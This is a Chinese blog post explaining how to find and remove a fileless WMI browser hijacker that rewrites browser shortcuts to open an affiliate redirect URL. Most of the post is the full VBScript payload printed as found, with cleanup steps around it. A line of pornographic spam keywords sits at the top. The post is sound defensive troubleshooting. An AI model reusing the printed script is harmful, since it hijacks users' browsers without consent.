超碰人人人人人,亚洲AV午夜福利精品一区二区,亚洲欧美综合区丁香五月1区,日韩欧美亚洲系列

LOGO OA教程 ERP教程 模切知識(shí)交流 PMS教程 CRM教程 開(kāi)發(fā)文檔 其他文檔  
 
網(wǎng)站管理員

[點(diǎn)晴永久免費(fèi)OA]“http://hao643.com/?r=wwwww&m=c166” 類(lèi)似這樣的惡意鏈接去除方法
admin
2018年11月4日 15:53 本文熱度 4433
網(wǎng)絡(luò)中游蕩,不經(jīng)意間就被感染,感染后不痛但是讓人瘙癢煩躁。
首先說(shuō)明出現(xiàn)的問(wèn)題,發(fā)現(xiàn)電腦每次開(kāi)機(jī)、不定時(shí)(也許這個(gè)病毒設(shè)置的就是定時(shí),沒(méi)有具體統(tǒng)計(jì))的出現(xiàn) 谷歌瀏覽器、ie瀏覽器 的快捷方式被修改,我修改和還原后沒(méi)用,不躲久就又加上惡意網(wǎng)址鏈接了。我已經(jīng)把注冊(cè)表、各種瀏覽器的的主頁(yè)都更改了,沒(méi)用。惡意修改后如下:
eg:"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://hao643.com/?r=wwwww&m=c166
這是我的谷歌瀏覽器被惡意更改后,后果是,每次打開(kāi)都會(huì)跳到 https://www.hao123.com/?tn=97175858_hao_pg,分析這個(gè)網(wǎng)址,前面 https://www.hao123.com/,hao123是一個(gè)上網(wǎng)導(dǎo)航(Directindustry Web Guide),百度旗下 “核心” 產(chǎn)品。后面的 ?tn=97175858_hao_pg ,tn(是technology的縮寫(xiě)么?)等號(hào)的后面的數(shù)字是推廣員的推廣編號(hào) 97175858,_hao_pg :這個(gè)大概表示的就是 “hao” 下的 pg(大概是page的意思),所以說(shuō)你訪(fǎng)問(wèn)了這個(gè)網(wǎng)址,就會(huì)給這個(gè)推廣員賺錢(qián)。
對(duì)了,還有開(kāi)頭的 http://hao643.com/?r=wwwww&m=c166  ,這個(gè)網(wǎng)址就是一個(gè)跳板,每次訪(fǎng)問(wèn)他都會(huì)跳到  https://www.hao123.com/?tn=97175858_hao_pg ,暫且留坑,以后搞明白了利弊再分析。
如果你出現(xiàn)了類(lèi)似的問(wèn)題,并且檢查過(guò)注冊(cè)表、更改了瀏覽器的主頁(yè)、殺毒軟件查殺過(guò)全部系統(tǒng),但還是沒(méi)有效果。

解決方法:
方法一:
下載火絨安全軟件(https://www.huorong.cn),執(zhí)行病毒檢查,就會(huì)提示發(fā)現(xiàn)了WMI病毒,清除即可。

方法二:
查找資料,發(fā)現(xiàn)這應(yīng)該是一個(gè)通過(guò)WMI發(fā)起的定時(shí)自動(dòng)運(yùn)行腳本。要查看WMI事件,到以下地址下載WMITool并安裝,
http://www.cr173.com/soft/88291.html
安裝后打開(kāi)WMI event viewer,點(diǎn)擊左上角register for events,彈出Connect to namespace框,填入“root\CIMV2” (我的是默認(rèn)出現(xiàn)的,如果這個(gè)不行,可以試試填入“root\subscription”),確定,出現(xiàn)下圖:
Filters 下,也許每個(gè)人的情況會(huì)不同,但是關(guān)鍵是在右面右鍵點(diǎn)擊 ActiveScript... ,選擇view instance properties ,會(huì)出現(xiàn):
就是這里,ScriptText里面,有Value,我這個(gè)感染的代碼是:
On Error Resume Next:Const link = "http://hao643.com/?r=wwwww&m=c166":Const link360 = "http://hao643.com/?r=wwwww&m=c166&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths
 = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\lenovo\Desktop,C:\Users\lenovo\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\lenovo\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\lenovo\AppData\Roaming\Microsoft\Internet
 Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\lenovo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr
 = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder
 In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path)
 & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End
 If:End If:Next:End If:Next:

查看ScriptText項(xiàng)可知,這是一段VBScript調(diào)用系統(tǒng)服務(wù)間隔30分鐘執(zhí)行一次,將所有瀏覽器調(diào)用加上“http://www.2345.com/?kunown”!抓住你了~!隱藏的夠深,沒(méi)常駐進(jìn)程,沒(méi)有文件(把自己存儲(chǔ)在WMI數(shù)據(jù)庫(kù)中),靠~!

受到影響的瀏覽器有(各色瀏覽器,差不多齊了):
"IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe",
 "liebao.exe", "QQBrowser.exe"

最后,清除方法:在WMI event viewer中將“_EventFilter:Name="unown_filter"”項(xiàng)目右鍵刪除!

刪不掉?

到WMITool安裝路徑(例如:C:\Program Files (x86)\WMI Tools)下,右鍵點(diǎn)擊wbemeventviewer.exe,選擇以管理員身份運(yùn)行!刪之!

還沒(méi)完,還要手動(dòng)將快速啟動(dòng)欄中,將各個(gè)瀏覽器快捷命令中的http://www.2345.com/?kunown去掉!

暫時(shí)就這么多了,還有沒(méi)有其它影響的話(huà),用用再看吧!

嗯,好歹這蒼蠅到底還是吐出去了!

該文章在 2018/11/4 16:00:12 編輯過(guò)
關(guān)鍵字查詢(xún)
相關(guān)文章
正在查詢(xún)...
點(diǎn)晴ERP是一款針對(duì)中小制造業(yè)的專(zhuān)業(yè)生產(chǎn)管理軟件系統(tǒng),系統(tǒng)成熟度和易用性得到了國(guó)內(nèi)大量中小企業(yè)的青睞。
點(diǎn)晴PMS碼頭管理系統(tǒng)主要針對(duì)港口碼頭集裝箱與散貨日常運(yùn)作、調(diào)度、堆場(chǎng)、車(chē)隊(duì)、財(cái)務(wù)費(fèi)用、相關(guān)報(bào)表等業(yè)務(wù)管理,結(jié)合碼頭的業(yè)務(wù)特點(diǎn),圍繞調(diào)度、堆場(chǎng)作業(yè)而開(kāi)發(fā)的。集技術(shù)的先進(jìn)性、管理的有效性于一體,是物流碼頭及其他港口類(lèi)企業(yè)的高效ERP管理信息系統(tǒng)。
點(diǎn)晴WMS倉(cāng)儲(chǔ)管理系統(tǒng)提供了貨物產(chǎn)品管理,銷(xiāo)售管理,采購(gòu)管理,倉(cāng)儲(chǔ)管理,倉(cāng)庫(kù)管理,保質(zhì)期管理,貨位管理,庫(kù)位管理,生產(chǎn)管理,WMS管理系統(tǒng),標(biāo)簽打印,條形碼,二維碼管理,批號(hào)管理軟件。
點(diǎn)晴免費(fèi)OA是一款軟件和通用服務(wù)都免費(fèi),不限功能、不限時(shí)間、不限用戶(hù)的免費(fèi)OA協(xié)同辦公管理系統(tǒng)。
Copyright 2010-2025 ClickSun All Rights Reserved